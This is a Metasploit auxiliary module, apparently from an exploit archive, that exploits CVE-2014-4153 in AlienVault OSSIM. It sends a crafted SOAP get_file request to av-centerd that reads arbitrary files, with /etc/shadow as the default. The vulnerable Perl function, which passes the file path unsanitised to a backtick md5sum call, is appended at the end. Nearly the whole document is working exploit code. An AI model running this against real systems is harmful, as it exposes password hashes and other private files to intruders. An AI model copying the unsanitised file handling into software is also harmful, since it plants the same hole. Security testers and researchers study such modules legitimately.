Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)

                							

                require 'msf/core'

class MetasploitModule < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize
		super(
			'Name'        => 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
			'Description' => %q{
				This module exploits an information disclosure vulnerability found within the get_file
				function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
				that allows for the leaking of arbitrary file information.
			},
			'References'  =>
			[
				[ 'CVE', '2014-4153' ],
				[ 'ZDI', '14-207' ],
				[ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
			],
			'Author'      => [ 'james fitts' ],
			'License'     => MSF_LICENSE,
			'DisclosureDate' => 'Jun 13 2014')

		register_options([
			Opt::RPORT(40007),
			OptBool.new('SSL',   [true, 'Use SSL', true]),
			OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
		], self.class)
	
	end

	def run

		soap =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
		soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
		soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
		soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
		soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
		soap += "<soap:Body>\r\n"
		soap += "<get_file xmlns=\"AV\/CC\/Util\">\r\n"
		soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
		soap += "<c-gensym5 xsi:type=\"xsd:string\">423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</c-gensym5>\r\n"
		soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
		soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
		soap += "<c-gensym11 xsi:type=\"xsd:string\">#{datastore['FILE']}</c-gensym11>\r\n"
		soap += "</get_file>\r\n"
		soap += "</soap:Body>\r\n"
		soap += "</soap:Envelope>\r\n"

		res = send_request_cgi(
			{
				'uri'	=>	'/av-centerd',
				'method'	=>	'POST',
				'ctype'		=>	'text/xml; charset=UTF-8',
				'data'		=>	soap,
				'headers'	=>	{
					'SOAPAction'	=>	"\"AV/CC/Util#get_file\""
				}
			}, 20)

		if res && res.code == 200
			print_good("Dumping contents of #{datastore['FILE']} now...")
			data = res.body.scan(/(?<=xsi:type="soapenc:Array"><item xsi:type="xsd:string">)[\S\s]+<\/item><item xsi:type="xsd:string">/)
			puts data[0].split("<")[0]
		else
			print_bad("Something went wrong...")
		end

	end

end
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_file {
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
        = @_;
    my $file_content;

    verbose_log_file(
        "GET FILE      : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
    );

    if ($r_file =~  /[;`\$\<\>\|]/) {
        console_log_file("Not allowed r_file: $r_file in get_file\n");
        my @ret = ("Error");
        return \@ret;
    }

    if ( !-f "$r_file" ) {
        #my @ret = ("Error");
        verbose_log_file("Error file $r_file not found!");
        # Return empty file if not exists
        my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
        return \@ret;
    }

    my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );

    if ( open( my $ifh, $r_file ) ) {

        binmode($ifh);
        $file_content = do { local $/; <$ifh> };
        close($ifh);

        my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
        return \@ret;

    }
    else {
        my @ret = ("Error");
        verbose_log_file("Error file $r_file not found!");
        return \@ret;

    }

}